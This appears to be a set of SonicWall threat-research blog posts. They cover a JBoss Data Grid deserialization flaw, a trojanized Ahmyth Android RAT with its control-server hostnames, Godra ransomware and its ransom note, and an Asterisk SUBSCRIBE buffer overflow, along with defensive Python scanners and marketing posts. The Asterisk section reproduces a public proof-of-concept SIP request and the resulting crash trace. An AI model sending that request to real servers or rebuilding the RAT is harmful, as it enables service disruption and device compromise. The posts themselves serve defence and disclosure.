Red Hat JBoss Data Grid Insecure Deserialization Vulnerability

Red Hat JBoss Data Grid is an in-memory data store. Client applications access it through the integrated Infinispan Hot Rod client library.

A deserialization vulnerability exists in Red Hat JBoss Data Grid. The Hot Rod client library did not filter which classes it would deserialize, so any serialized object read from the cache was deserialized as-is. An attacker who can place a malicious serialized object in the cache can therefore execute arbitrary code with the privileges of the client application that retrieves it.

Java object serialization turns an object into a byte stream and back again, which makes objects portable between processes. The reverse step, deserialization, is a security risk whenever the stream comes from an untrusted source: the classes named in the stream are instantiated and their deserialization callbacks run before the application ever sees the resulting object, and a chain of otherwise legitimate classes (a gadget chain) can be arranged so that this runs attacker-chosen actions. The accepted mitigation is a whitelist of permitted classes, enforced before any class named in the stream is resolved.

The Hot Rod client library shipped with version 7.1.0 lacks this whitelisting entirely. Version 7.1.1 added a whitelist, but it could still be bypassed through the JBoss Marshalling River protocol:

In class org.infinispan.client.hotrod.marshall.MarshallerUtil:

In class org.infinispan.commons.marshall.jboss.AbstractJBossMarshaller:
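
As an added example (not code from Infinispan, Red Hat or the original advisory), the whitelist idea above implemented as a pre-filter that a proxy or the client could run over a cache value before handing it to a Java deserializer: it scans the Java serialization stream for the class descriptors an ObjectInputStream would resolve and rejects the value if any named class is outside an allowlist. The allowlist, the class names and the serialized streams are all constructed here. Inside the JVM the same policy belongs in an ObjectInputFilter or the marshaller's own class whitelist; this scan complements that, it does not replace it.

```python
"""Allowlist pre-filter for Java serialization streams (added example).

Scans the class descriptors (TC_CLASSDESC) that a Java ObjectInputStream
would resolve and rejects the stream before deserialization if any class
falls outside an allowlist. Constructed streams stand in for cache values.
"""
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"     # STREAM_MAGIC + STREAM_VERSION
TC_NULL, TC_CLASSDESC, TC_OBJECT, TC_ENDBLOCKDATA = 0x70, 0x72, 0x73, 0x78
SC_SERIALIZABLE = 0x02
# Fully qualified Java class name with dotted packages; array descriptors are not handled.
_CLASS_NAME = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")


def extract_class_names(stream: bytes) -> list:
    """Return class names found in TC_CLASSDESC records, in stream order.

    This walks the bytes rather than the full grammar: it does not follow
    TC_REFERENCE back-references or TC_PROXYCLASSDESC records, so it is a
    pre-filter in the spirit of a network signature, not a stream parser.
    """
    if not stream.startswith(STREAM_MAGIC):
        raise ValueError("not a Java serialization stream")
    names = []
    i = len(STREAM_MAGIC)
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            (length,) = struct.unpack_from(">H", stream, i + 1)   # modified-UTF-8 length
            raw = stream[i + 3:i + 3 + length]
            name = raw.decode("ascii", errors="replace")
            if len(raw) == length and _CLASS_NAME.match(name):
                names.append(name)
                i += 3 + length          # skip the name so its bytes are not rescanned
                continue
        i += 1
    return names


def class_allowed(name: str, allowlist: tuple) -> bool:
    """Entries ending in '.' are package prefixes; anything else must match exactly."""
    return any(name == entry or (entry.endswith(".") and name.startswith(entry))
               for entry in allowlist)


def check_allowlist(stream: bytes, allowlist: tuple) -> tuple:
    """Return (accepted, offending_classes).

    A stream that names no recognisable class is rejected as well, so an
    encoding the scanner does not understand fails closed.
    """
    names = extract_class_names(stream)
    offending = [n for n in names if not class_allowed(n, allowlist)]
    return (bool(names) and not offending, offending)


# Constructed test streams, built by hand from the Java Object Serialization
# Stream Protocol; they are not captured Hot Rod traffic.
def _class_desc(name: str, suid: int) -> bytes:
    raw = name.encode("ascii")
    return (bytes([TC_CLASSDESC]) + struct.pack(">H", len(raw)) + raw
            + struct.pack(">q", suid)            # serialVersionUID
            + bytes([SC_SERIALIZABLE])           # classDescFlags
            + struct.pack(">H", 0)               # no serializable fields
            + bytes([TC_ENDBLOCKDATA]))          # empty class annotation


def build_object_stream(class_chain: list) -> bytes:
    """TC_OBJECT whose descriptor chain is class_chain[0] extends class_chain[1] ..."""
    descs = b"".join(_class_desc(n, i + 1) for i, n in enumerate(class_chain))
    return STREAM_MAGIC + bytes([TC_OBJECT]) + descs + bytes([TC_NULL])


ALLOWLIST = ("com.example.",)                    # hypothetical application package
TRUSTED_VALUE = build_object_stream(["com.example.Point"])
UNTRUSTED_VALUE = build_object_stream(["org.example.Unlisted", "com.example.Point"])

if __name__ == "__main__":
    for label, value in (("trusted", TRUSTED_VALUE), ("untrusted", UNTRUSTED_VALUE)):
        print(label, extract_class_names(value), check_allowlist(value, ALLOWLIST))
```

The scanner deliberately fails closed: a stream naming no recognisable class is rejected, because the scan does not follow back-references or proxy descriptors and an attacker could otherwise hide a class behind an encoding it skips. Treat it as the network-side counterpart of the IPS signature below, not as the in-process fix that 7.1.2 provides.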

Red Hat JBoss Data Grid 7.1.2 fixes the issue (see RHSA-2018:0294 in the references below). SonicWall Capture Labs Threat Research team has also developed the following signature to identify and stop attacks:

  • IPS 13248: Red Hat JBoss Data Grid Insecure Deserialization

Reference:

  1. Infinispan open-source library: http://grepcode.com/file/repo1.maven.org/maven2/org.infinispan/infinispan-client-hotrod/
  2. Red Hat JBoss Data Grid 7.1.2 security update: https://dl.packetstormsecurity.net/1802-advisories/RHSA-2018-0294-01.txt

Trojanized Android Ahmyth RAT spreads via legitimate apps

SonicWall Capture Labs Threats Research team observed an Android Remote Administration Tool (RAT) named Ahmyth being bundled into other Android apps and distributed in the wild. Once it infects an Android device, this RAT can exfiltrate sensitive information from the device, such as SMS messages and call logs, and can take pictures, send text messages or record audio through the microphone.

Investigating a couple of malicious samples led us to the origin of this RAT: a GitHub repository that hosts its source code, https://github.com/AhMyth.

This RAT was released in 2017, and its server component supports multiple operating systems:

The author claims that this was developed for educational purposes (as highlighted on Github) but clearly someone is spreading this RAT for their own malicious motives, more on that later.

Inside Ahmyth

This RAT contains two components:

  • Client side component – which runs on the victim’s Android device
  • Server side component – this runs on the computer which is used to monitor the victim and send commands to the infected device

Installing and running the server component brings up the opening screen, which lists connected victims; in our lab there were none yet, since we had not infected any device at that point.

For the client to report back, we set our server's IP address when building the apk; the resulting apk connects back to our machine:

Now the apk is ready to infect a device and report back to the server. Upon installing on a device the apk reports back to the server and we can see the victim’s entry on the dashboard:

The attacker can now command the RAT to perform a number of functions, a few of which are listed below:

  • View Call logs
  • View and send SMS
  • View contacts
  • View GPS location of the device
  • View files on the device

The samples we obtained were built with different control-server addresses. Each apk reports back to the address it was built with:

  • oleg12221443242.zapto.org:2222
  • vivanesko2002.ddns.net:22708
  • tafelrubber.us.to:6220

Spreading Ahmyth further

Malicious apks spread mainly via the following two routes:

  • As a text message with a link to install the malicious apk
  • As an email message containing a link to install the app

Additionally an attacker can spread this RAT via the Ahmyth control server by:

  • Sending a text message from the infected device to one of the victim's contacts. To the new target the message appears to come from someone they know, so it is more likely to be trusted and acted on

Another way to spread this RAT is to hide it inside something benign. Malware writers have already started combining Ahmyth with clean Android apks; we identified a few of them:

  • Minecraft (com.mojang.minecraftpe)
  • YouTube Downloader (dentex.youtube.downloader)

Below is a comparison of the code structure found in the original Ahmyth client apk and a few trojanized samples in the wild:

Overall this looks like another case where a publicly available tool has been used for personal reasons with a malicious intent. We can expect more trojanized Android samples with a hidden Ahmyth RAT in the near future.
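
A triage check in the spirit of the code-structure comparison above, as an added example that is not part of the original post or of the Ahmyth project: it opens an apk as the zip it is and looks in every classes*.dex for the Dalvik descriptor of the Ahmyth client package and for the control-server hostnames listed earlier. The apks built here are constructed stand-ins, and the check rests on the same assumption as the comparison above, that trojanized builds keep the ahmyth.mine.king.ahmyth class names; a repackager who renames the package would defeat the string match.

```python
"""Triage check for Ahmyth client code hidden inside an Android apk (added example)."""
import io
import zipfile
from typing import Dict, List

# Dalvik descriptor prefix of the Ahmyth client package (ahmyth.mine.king.ahmyth).
# Assumption: trojanized builds keep these class names, as the code-structure
# comparison above suggests; a repackager who renames the package defeats this.
AHMYTH_DESCRIPTOR = b"Lahmyth/mine/king/ahmyth/"
# Control-server hosts observed in the samples discussed above.
KNOWN_C2_HOSTS = (
    b"oleg12221443242.zapto.org",
    b"vivanesko2002.ddns.net",
    b"tafelrubber.us.to",
)


def scan_apk(apk_bytes: bytes) -> Dict[str, List[str]]:
    """Look in every classes*.dex for the Ahmyth package and known C2 hosts.

    An apk is a zip; the Dalvik bytecode lives in classes.dex and, for
    multidex builds, classes2.dex, classes3.dex and so on.
    """
    hits: Dict[str, List[str]] = {"dex_with_ahmyth": [], "c2_hosts": []}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        for entry in apk.namelist():
            if not (entry.startswith("classes") and entry.endswith(".dex")):
                continue
            data = apk.read(entry)
            if AHMYTH_DESCRIPTOR in data:
                hits["dex_with_ahmyth"].append(entry)
            for host in KNOWN_C2_HOSTS:
                if host in data and host.decode() not in hits["c2_hosts"]:
                    hits["c2_hosts"].append(host.decode())
    return hits


def is_trojanized(apk_bytes: bytes) -> bool:
    """True when either indicator is present in any dex file."""
    hits = scan_apk(apk_bytes)
    return bool(hits["dex_with_ahmyth"] or hits["c2_hosts"])


def build_fake_apk(dex_blobs: Dict[str, bytes]) -> bytes:
    """Constructed stand-in for an apk: a zip holding the given dex entries.

    Real apks also carry a binary AndroidManifest.xml, resources and a
    signature; none of that is needed for a string scan, so a placeholder
    manifest is written instead.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"placeholder, not a real binary manifest")
        for name, blob in dex_blobs.items():
            z.writestr(name, blob)
    return buf.getvalue()


# Constructed samples; the class names are chosen for the example and these are
# not the apks whose hashes are listed at the end of this post.
HOST_APP_DEX = b"dex\n035\x00Lcom/mojang/minecraftpe/MainActivity;\x00"
CLEAN_APK = build_fake_apk({"classes.dex": HOST_APP_DEX})
TROJANIZED_APK = build_fake_apk({
    "classes.dex": HOST_APP_DEX,
    "classes2.dex": b"dex\n035\x00Lahmyth/mine/king/ahmyth/MainService;\x00"
                    b"vivanesko2002.ddns.net\x00",
})

if __name__ == "__main__":
    print("clean:", scan_apk(CLEAN_APK))
    print("trojanized:", scan_apk(TROJANIZED_APK))
```

Run it against a real sample by passing the bytes of the apk file to scan_apk(); a hit in a classes2.dex of an app that has no business containing a RAT package is the same signal the comparison above shows visually.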


Sonicwall Capture Labs provides protection against this threat with the following signatures:

  • GAV: AndroidOS.AhRat.INFSTLR (Trojan)
  • GAV: AndroidOS.AhRat.INFSTLR_2 (Trojan)
  • GAV: AndroidOS.AhRat.INFSTLR_3 (Trojan)


Basic details about the samples analyzed:

  • Package name: ahmyth.mine.king.ahmyth
    MD5: 8a630c3f3d441f012778efac3d154b90
  • Package name: com.mojang.minecraftpe
    MD5: c552f2565df8b793fa68870309489b72
  • Package name: dentex.youtube.downloader
    MD5: c1f5e9e560388d5aeedc71628967e119
  • Package name: com.apkhere.flashlight
    MD5: 2b648af46eb081d896768a9b3413e3b4


2018 SonicWall Cyber Threat Report: Actionable Intelligence for the Cyber Arms Race

Make no mistake, we are in a global cyber arms race. But it can’t be won alone: we are in this together.

That is why SonicWall is passing along findings, intelligence, analysis and research from our SonicWall Capture Labs to you today in our 2018 SonicWall Cyber Threat Report. By sharing actionable intelligence, we can help level the playing field against today’s most malicious cyber criminals.

Together, we face many battlefronts: some subsiding, some ongoing, others still on the horizon. Our latest Cyber Threat Report shows us where we — and our common cyber enemies — have advanced. Plus, it offers strategic insight on how, together, we can keep the upper hand.

Security Industry Advances

Ransomware attacks are down
The Cyber Threat Report looks at why expectations of increased numbers of ransomware attacks never materialized in 2017, even with WannaCry, NotPetya and Bad Rabbit stealing the headlines. At the same time, however, data from our cloud-based, multi-engine Capture Advanced Threat Protection (ATP) sandbox noted a spike in unique ransomware variants. While the volume was lower, the attacks were more targeted, unique and difficult to stop.

SSL, TLS encryption are up
The report documents a rapid increase of HTTPS in comparison to unencrypted HTTP sessions, which is critical for the security of cloud environments/applications and websites. However, this shift has given more opportunity for cyber criminals to hide malicious payloads in encrypted sessions. Unfortunately, while effective protection exists using deep packet inspection (DPI), there is still a widespread fear of complexity and lack of awareness around the need to inspect SSL and TLS sessions to stop hidden cyber attacks.

Exploit kits are shifting targets
Since browser vendors have largely phased out Adobe Flash, new Flash Player exploits have dropped off. But the Cyber Threat Report reveals some unexpected applications that are taking its place. Organizations should continually redefine and broaden the scope of applications and related files that could present a risk. In analyzing application volume, machine-learning technology can help protect against newer attack vectors.

Law enforcement disrupting cyber crime
Arrests of key malware and exploit kit authors are making a significant dent in the scale, volume and success of cyber attacks. In response, cyber criminals are being more careful with how they conduct business. Our latest report considers shifting trends in payment methods — particularly bitcoin — as well as other forces driving shifting trends in ransomware.

Cyber Criminal Advances

Ransomware variants increase
Despite a plunge in ransomware payouts, and a significant drop in total volume of ransomware attacks year over year, SonicWall Capture Labs identified a new malware variant for every 250 unknown hits. These new variants proved to be fairly effective when utilized. The Cyber Threat Report examines whether 2017 was an outlier, or if 2018 will signify a true shift in the threat landscape.

Encryption hiding cyber attacks
While encrypting traffic is a necessary practice, it can also cloak illegal or malicious traffic. For the first time ever, the 2018 SonicWall Cyber Threat Report offers real-world data from SonicWall Capture Labs that unmasks the volume of malware and other exploits hidden in encrypted sessions. These Capture Labs findings are our first empirical data available on SSL- and TLS-based attacks.

Malware cocktails shaking things up
Cyber criminals are creating “malware cocktails” that mainly rely on preexisting code with a few minor variants. These can spread quickly and more dangerously, while avoiding detection. While no single exploit kit rose to the level of Angler or Neutrino in 2016, there were plenty of malware writers leveraging one another’s code and mixing them to form new malware, thus putting a strain on signature-only security controls. The Cyber Threat Report looks at trending exploit kits and how they have repurposed old code for new gains.

IoT, chip processors are emerging battlegrounds
Cyber criminals are pushing new attack techniques into advanced technology spaces, notably the Internet of Things (IoT) and chip processors. These potential vectors for cyber attack are grossly overlooked and unsecured.

The Cyber Threat Report explains how modern malware writers implement advanced techniques, including custom encryption, obfuscation and packing, as well as acting benign within sandbox environments, to allow malicious behavior to remain hidden in memory. These techniques often hide the most sophisticated weaponry, which is only exposed when run dynamically. In most cases, they’re impossible to analyze in real time using static detection techniques.

Inside the SonicWall Cyber Threat Report

You’ll find more detail on these advances by the security industry and cyber criminals in the latest 2018 SonicWall Cyber Threat Report. The report empowers you and your team with:

  • Proprietary empirical data that you will get nowhere else to help you confidently understand key cyber threat trends
  • Detailed predictions on trending threats and security solutions to help you plan and budget resources
  • Expert best practices and valuable resources to help successfully guide you forward

    Get the 2018 SonicWall Cyber Threat Report

    The cyber arms race is a challenge we face together. And it’s the core reason we’re committed to passing our findings, intelligence, analysis and research to the global public via the SonicWall 2018 Cyber Threat Report.

     

SonicWall Recognized on CRN’s 2018 Security 100 List

Today CRN, a brand of The Channel Company, has named SonicWall to its annual Security 100 list.

This project recognizes the coolest security vendors in each of five categories: Endpoint Security; Identity Management and Data Protection; Network Security; SIEM and Security Analytics; and Web, Email and Application Security. The companies on CRN’s Security 100 list have demonstrated creativity and innovation in product development as well as a strong commitment to delivering those offerings through a vibrant channel of solution providers.

In addition to recognizing security technology vendors for outstanding products and services, the Security 100 list serves as a valuable guide for solution providers trying to navigate the IT security market. The list aids prospective channel partners in identifying the vendors that can best help them improve or expand their security offerings.

“The core elements of today’s businesses, both large and small, depend upon robust and reliable cybersecurity solutions,” said Bob Skelley, CEO of The Channel Company. “Unprecedented streams of data, the sweeping transition to cloud computing, vast networks of wireless systems, the rapidly growing Internet of Things—all these advances necessitate increasingly complex and adaptive security measures. CRN’s 2018 Security 100 list recognizes top vendors that are meeting this extraordinary demand with the most innovative security technologies on the market, enabling businesses to grow uninterrupted.”

This announcement comes just 24 hours ahead of the launch of the 2018 SonicWall Cyber Threat Report. This premier cyber security industry report puts you a step ahead of cyber criminals in the global cyber war, empowering you with proprietary security data, global knowledge and latest trends, gathered and analyzed by our leading-edge SonicWall Capture Labs Threat Network. The 2018 Cyber Threat Report is available on March 6.

The Security 100 list will be featured in the April 2018 issue of CRN and online at www.crn.com/security100.

Godra Ransomware demands 200,000 Euros for decryption

The SonicWall Capture Labs Threats Research team has come across ransomware, written in Bosnian, that pretends to come from the Croatian Financial Agency (FINA). It is reported to arrive by email and demands an astronomical 200,000 Euros in bitcoin for decryption.

Infection cycle:

The Trojan uses the following icon:

The Trojan drops the following files onto the system:

  • %APPDATA%\Prijedlog_za_ovrhu_urbr_220-2017.pdf
  • KAKO OTKLJUČATI VAŠE DATOTEKE.log (in every folder containing encrypted files)

Prijedlog_za_ovrhu_urbr_220-2017.pdf is a text file and contains the following text:

1519925249

This text is a Unix epoch timestamp (1519925249 is 1 March 2018, 17:27:29 UTC). The file serves as a mutex to prevent double infection: if it already exists, the Trojan does not encrypt the system again.

KAKO OTKLJUČATI VAŠE DATOTEKE.log contains the following text:

The text is in Bosnian. We translated it to English using Google Translate:

YOUR PERSONAL FILES ARE CREATED !!!
WARNING!
DO NOT TEST DECEPTATE YOUR FILES ONLY. EVERY MODIFICATION OF DECEPTED FILES MAKE SUCCESSFUL MUCH! ONE WAY TO DETERMINE YOUR FILES IS IMPORTANT TO COMPLETE INSTRUCTIONS !!!

What happened to my computer?
All your essential files are encrypted. All your documents, photos, video materials, databases and other files are no longer available because they are encrypted. Do not poke and waste time decrypting or restoring your files because no one can decrypt your files without our decryption service.

Can I restore my files?
Of course. WE GUARANTEE the return of your files after payment: 2.000,00 EUR (two hundred thousand) in BTC (BitCoin) equivalent
You have 48 hours to send a payment, otherwise the price is doubled. Also, if you do not make a payment after another 72 hours, your files will be lost irretrievably. After the payment has been made, please send us the “User ID” and the wallet number from which the payment was made to godra@protonmail.ch
User ID: 1519657128
After that, we will send you decryption software that will restore your files. Please note that * NOT IN WHAT MODE * you do not modify your encrypted files because the return will NOT be possible.
You can send us a file at godra@protonmail.ch (up to 100kB) in order to prove to you that decryption is possible.

HOW TO PAY?
We only accept payments in BTC (BitCoin) currency. The payment must be made to the following address:
13srq1SP93mEs7asR2UxWBUts3x9oUcuac
Do not use “deep web” wallets such as Tor Wallet, Onion Wallet, Shadow Wallet, Hidden Wallet and the like.
Buy BTC (BitCoin) only from the official BitCoin Exchange!
Official exchange rate and prices: https://howtobuybitcoins.info/
Shopping recommendations: https://bit4coin.net/ or https://www.coinbase.com/ or https://xcoins.io/
Bit4Net does not need registration! You can buy BitCoin via PayPal at Xcoins.io!
E-mail address for communication: godra@protonmail.ch
Send us an e-mail with your “User ID” and the wallet from which the payment was made!
WARNING!
DO NOT TEST DECEPTATE YOUR FILES ONLY. EVERY MODIFICATION OF DECEPTED FILES MAKE SUCCESSFUL MUCH! ONE WAY TO DETERMINE YOUR FILES IS IMPORTANT TO COMPLETE INSTRUCTIONS !!!

We reached out to godra@protonmail.ch via email but received no response.

The Trojan attempts to contact fina.online but at the time of writing the page appears to have been cleaned up:

Upon debugging the executable, the Trojan is seen iterating through files on the system, encrypting those files and appending “godra” to their names after encryption:

The Trojan uses its own custom encryption routine. We were able to locate the encryption algorithm and the key in the binary; these can potentially be used to restore files:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Godra.RSM (Trojan)

 

Sneak Peek: 2018 SonicWall Cyber Threat Report

The cyber security industry relies on a perpetual cadence of collaboration, research, analysis and review.

For SonicWall, that comes via our in-depth cyber threat report. This year, we’re excited to announce that we will publish the 2018 SonicWall Cyber Threat Report on Tuesday, March 6.

This premier cyber security industry report puts you a step ahead of cyber criminals in the global cyber war, empowering you with proprietary security data, global knowledge and latest trends, gathered and analyzed by our leading-edge SonicWall Capture Labs Threat Network.

Reimagined and refreshed, the 2018 SonicWall Cyber Threat Report is more comprehensive, informative and actionable than ever before with:

  • A comprehensive comparison of security industry advances versus cybercriminal advances year-over-year, to help you know where you stand
  • Proprietary empirical data that you will get nowhere else, to help you confidently understand key threat trends
  • Detailed predictions on trending threats and security solutions, to help you plan and budget resources
  • Expert best practices and valuable resources, to help successfully guide you forward

Here is a sneak preview

The modern cyber war — against governments, businesses and users alike — is comprised of a series of attacks, counterattacks and respective defensive countermeasures. Many are simple and effective. Others are targeted and complex. Yet they are all highly dynamic and require persistence, commitment and resources to mitigate.

Unfortunately, organizations large and small are caught in the middle of a global cyber arms race with vastly different resources at their disposal. And while growing budgets do make a positive impact on the effectiveness against known exploits, the threat landscape evolves at such a rate that yesterday’s investment in technology could already be insufficient to deal with tomorrow’s cyber threats.

No one has immunity.

Headline breaches

2017 was another record year for data breaches. The 2018 SonicWall Cyber Threat Report breaks these down by the numbers.

Ransomware

With WannaCry, Petya and Bad Rabbit all becoming headline news, ransomware was a hot topic for the second year in a row. The 2018 SonicWall Cyber Threat Report reveals a key indicator of how attack strategies are shifting.

Memory attacks

While the Meltdown and Spectre vulnerabilities only became public in early 2018, the processor flaws were discovered and reported to the vendors in 2017. In fact, Intel notified Chinese technology companies of the vulnerability before alerting the U.S. government.

Threat actors and cybercriminals are already leveraging memory as an attack vector. Because these memory-based attacks arrive encrypted or packed with custom schemes that cannot be unpacked ahead of execution, organizations must detect, capture and track them at the moment they are exposed in memory, usually in under 100 nanoseconds. Chip-based attacks will be at the forefront of the cyber arms race for some time to come.

IoT

The Internet of Things (IoT) also had a big year. The 2018 SonicWall Cyber Threat Report examines last year’s trends to predict what will be in the crosshairs next.

Business risk

Data breaches and cyber attacks are no longer back-of-mind concerns. The 2018 SonicWall Cyber Threat Report explains why they are the No. 1 risk to business, brand, operations and financials.

The battle within encrypted traffic

For the first time ever, the 2018 SonicWall Cyber Threat Report will provide key empirical data on the volume of attacks leveraging SSL/TLS encryption.


About the SonicWall Capture Labs Threat Network

Data for the 2018 SonicWall Cyber Threat Report was gathered by the SonicWall Capture Labs Threat Network, which sources information from global devices and resources including:

  • More than 1 million security sensors in more than 150 countries and territories
  • Cross‐vector, threat‐related information shared among SonicWall security systems, including firewalls, email security, endpoint security, honeypots, content-filtering systems and the SonicWall Capture Advanced Threat Protection multi‐engine sandbox
  • SonicWall internal malware analysis automation framework
  • Malware and IP reputation data from tens of thousands of firewalls and email security devices around the globe
  • Shared threat intelligence from more than 50 industry collaboration groups and research organizations
  • Intelligence from freelance security researchers

The full 2018 SonicWall Cyber Threat Report will feature detailed threat findings, best practices, predictions and more, to help you stay a step ahead in the global cyber war.

Asterisk SUBSCRIBE Request Buffer Overflow Vulnerability

Asterisk is a software implementation of a telephone private branch exchange (PBX). It allows telephones interfaced with a variety of hardware technologies to make calls to one another, and to connect to telephony services, such as the public switched telephone network (PSTN) and voice over Internet Protocol (VoIP) services.

A memory corruption vulnerability has been reported in Asterisk. Due to improper handling of the SUBSCRIBE request in the Session Initiation Protocol (SIP) implementation, a buffer overflow can be triggered in the memory of the service process. An attacker could send a crafted SUBSCRIBE request and cause a denial of service, or potentially remote code execution on the target server with the privileges of the service process.

SIP is a request-response application-layer protocol. The memory corruption is triggered while the Asterisk PJSIP-based SIP stack (res_pjsip_pubsub) parses the headers of a SUBSCRIBE request. During this process, the following C functions are called in sequence:

pubsub_on_rx_subscribe_request(): handles the incoming SUBSCRIBE request
subscription_get_generator_from_rdata(): selects the body generator for the subscription from the request's Accept headers

SIP has a header called “Accept”, which may appear multiple times in one request. When subscription_get_generator_from_rdata() processes the Accept headers, it copies each value into a fixed-size array on the stack, indexed by a running counter, num_accept_headers. That counter is driven entirely by how many Accept values the request carries, and it was never checked against the array's capacity. A request with more Accept headers than the array can hold therefore writes attacker-controlled bytes past the end of the array, into the rest of the stack frame.

A proof-of-concept request has been published on GitHub [1]:

  SUBSCRIBE sip:3000@127.0.0.1:5060 SIP/2.0
  To: 
  From: Test 
  Call-ID: 1627b84b-b57d-4256-a748-30d01d242199
  CSeq: 2 SUBSCRIBE
  Via: SIP/2.0/TCP 172.17.0.1:10394;branch=z9hG4bK1627b84b-b57d-4256-a748-30d01d242199
  Contact: 
  Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  (REPEAT ACCEPT FOR 50 TIMES)
  Event: message-summary
  Allow: 
  Allow: SUBSCRIBE, NOTIFY, INVITE, ACK, CANCEL, BYE, REFER, INFO, OPTIONS, MESSAGE
  Authorization: Digest username="3000",realm="asterisk",nonce="1517181436/80170188d05f4af45b8530366c8e7e5e",uri="sip:127.0.0.1:5060",response="a4a88b777731349899227dc3170efdcf",algorithm=md5
  Content-Length: 0

Each Accept header carries 100 ‘A’s and the header is repeated 50 times. The copies overrun the stack array with 0x41 bytes and overwrite the saved frame data that follows it; the stack-protector canary check then fails and the service process aborts:

  *** stack smashing detected ***: /opt/asterisk/sbin/asterisk terminated

  Thread 25 "asterisk" received signal SIGABRT, Aborted.
  [Switching to Thread 0x7ffff0481700 (LWP 129)]
  0x00007ffff5101428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54
  54	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
  (gdb) bt
  #0  0x00007ffff5101428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54
  #1  0x00007ffff510302a in __GI_abort () at abort.c:89
  #2  0x00007ffff51437ea in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff525b49f "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:175
  #3  0x00007ffff51e515c in __GI___fortify_fail (msg=, msg@entry=0x7ffff525b481 "stack smashing detected") at fortify_fail.c:37
  #4  0x00007ffff51e5100 in __stack_chk_fail () at stack_chk_fail.c:28
  #5  0x00007ffff1613be2 in subscription_get_generator_from_rdata (handler=, handler=, rdata=) at res_pjsip_pubsub.c:755
  #6  0x4141414141414141 in ?? ()
  #7  0x4141414141414141 in ?? ()
  #8  0x4141414141414141 in ?? ()
  #9  0x4141414141414141 in ?? ()
  #10 0x4141414141414141 in ?? ()
  #11 0x4141414141414141 in ?? ()
  #12 0x0041414141414141 in ?? ()
  #13 0x4141414141414141 in ?? ()
  ....
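
A request-side check for the condition described above, as an added example rather than Asterisk code or the published PoC: it parses a SIP request, counts Accept values across repeated and comma-separated Accept headers (the vulnerable loop counts values, not header lines), and flags a SUBSCRIBE whose count exceeds the capacity of the fixed array. The page does not state that capacity, so 32 is an assumed value for the example; the sample requests, including the To/From/Contact URIs, are constructed here and are not the PoC verbatim.

```python
"""Accept-header check for SIP SUBSCRIBE requests (added example)."""
from typing import Dict, List, Tuple

# Capacity of the fixed-size per-request Accept array being protected.
# Assumed value for this example; the page does not state the real limit.
MAX_ACCEPT_VALUES = 32


def parse_sip_request(raw: bytes) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a SIP request into its request line and an ordered header list.

    Header names are case-insensitive and may repeat; repeats are kept as
    separate entries (not merged) so they can be counted. Folded
    continuation lines are appended to the previous header's value.
    """
    head, _sep, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    request_line = lines[0]
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and headers:
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
            continue
        name, colon, value = line.partition(":")
        if not colon:
            raise ValueError(f"malformed header line: {line!r}")
        headers.append((name.strip().lower(), value.strip()))
    return request_line, headers


def accept_values(headers: List[Tuple[str, str]]) -> List[str]:
    """Collect every Accept value across repeated and comma-separated headers."""
    values = []
    for name, value in headers:
        if name == "accept":
            values.extend(v.strip() for v in value.split(",") if v.strip())
    return values


def check_subscribe(raw: bytes) -> Dict[str, object]:
    """Flag a SUBSCRIBE whose Accept values would overrun the fixed array."""
    request_line, headers = parse_sip_request(raw)
    method = request_line.split(" ", 1)[0].upper()
    values = accept_values(headers) if method == "SUBSCRIBE" else []
    return {
        "method": method,
        "accept_count": len(values),
        "longest_accept": max((len(v) for v in values), default=0),
        "suspicious": len(values) > MAX_ACCEPT_VALUES,
    }


def build_subscribe(accept_repeats: int, accept_value: str = "A" * 100) -> bytes:
    """Constructed SUBSCRIBE in the shape of the public PoC.

    The To/From/Contact URIs are placeholders chosen here, and the PoC's
    Authorization header is omitted: only the Accept count matters to the check.
    """
    lines = [
        "SUBSCRIBE sip:3000@127.0.0.1:5060 SIP/2.0",
        "To: <sip:3000@127.0.0.1>",
        "From: Test <sip:3000@127.0.0.1>;tag=1",
        "Call-ID: 1627b84b-b57d-4256-a748-30d01d242199",
        "CSeq: 2 SUBSCRIBE",
        "Via: SIP/2.0/TCP 172.17.0.1:10394;branch=z9hG4bK1627b84b",
        "Contact: <sip:3000@172.17.0.1:10394>",
    ]
    lines += [f"Accept: {accept_value}"] * accept_repeats
    lines += ["Event: message-summary", "Content-Length: 0"]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


if __name__ == "__main__":
    print(check_subscribe(build_subscribe(1, "application/simple-message-summary")))
    print(check_subscribe(build_subscribe(50)))
```

The check keys on the count rather than on the 100-byte values: the per-value copy in the vulnerable function is length-bounded, so long values alone are harmless, while the unchecked count is what walks off the end of the array. A real deployment should also require the request to be authenticated before it reaches this code path, as the PoC's Authorization header shows the bug is reachable by an authenticated peer.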

SonicWall Capture Labs Threat Research team has developed the following signature to identify and stop the attacks:

  • IPS 13238: Asterisk SUBSCRIBE Request Buffer Overflow

Reference:

SonicWall CEO Bill Conner Joins Cyber Security Panel on Capitol Hill

